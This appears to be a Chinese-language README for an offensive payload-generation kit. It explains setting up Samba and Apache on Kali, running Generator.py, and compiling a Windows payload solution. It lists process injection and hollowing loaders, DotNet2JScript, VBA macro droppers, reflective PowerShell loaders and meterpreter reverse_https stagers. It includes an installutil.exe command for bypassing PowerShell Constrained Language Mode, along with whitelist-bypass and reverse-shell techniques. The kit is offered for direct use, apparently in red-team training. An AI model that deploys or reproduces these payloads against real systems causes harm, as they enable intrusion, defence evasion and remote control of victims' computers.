- 在kali上安装smb, 开启smb服务,让windows可以访问文件
sudo apt install samba
sudo mv /etc/samba/smb.conf /etc/samba/smb.conf.old
sudo nano /etc/samba/smb.conf
[visualstudio]
path = /home/kali/data
browseable = yes
read only = no
sudo smbpasswd -a kali
sudo systemctl start smbd
mkdir /home/kali/data
chmod -R 777 /home/kali/data
-
在Windows上安装Visual Studio
-
将输出文件out链接到/var/www/html(可能需要修改apache配置文件,允许访问软链接),将工具放在/var/www/html/tools (可能需要修改权限)
ln -s ./out /var/www/html
mkdir /var/www/html/tools
- 根据自己在/var/www/html中的工具,修改data/usage.md,脚本会自动修改ip
- 运行 参数为指定网卡
./Generator.py tun0
./Generator.py eth0
-
切换到Windows打开payloads/payloads.sln,重新生成
-
切换回kali,继续运行
-
打开usage.md,直接对命令进行复制粘贴
按提示在windows上打开payloads.sln,编译程序(可能需要修改生成程序的路径)
所有结果都生成在out中
所有url和命令都在usage.md,直接复制命令
- inject 进程注入 exe
- hollowing exe
- inject dll
- hollowing dll
- Dotnet2jscript inject dll
- Dotnet2jscript hollowing dll
- BypassCLM exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Users\admin\Desktop\BypassCLM.exe
- aspx
- compiler绕过白名单
- Installer直接反弹shell绕过白名单 有点问题 wmi的正常
- inject.ps1 直接注入
- reflection.ps1 powershell反射 inject/hollow
- netreflection.ps1net反射dll 路径可能需要修改
- msfvenom直接生成的
- loader.vba 普通方法 x86
- vba执行powershell 调用WMI 6.8.2 可以是x64 必须修改为runner.doc
- 绕过白名单
- Compiler白名单绕过 http:///other/test.xml http:///other/test.txt
- wmic执行powershell 放到了Csharp中
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter/reverse_https thread
windows/meterpreter/reverse_https
windows/meterpreter/reverse_https thread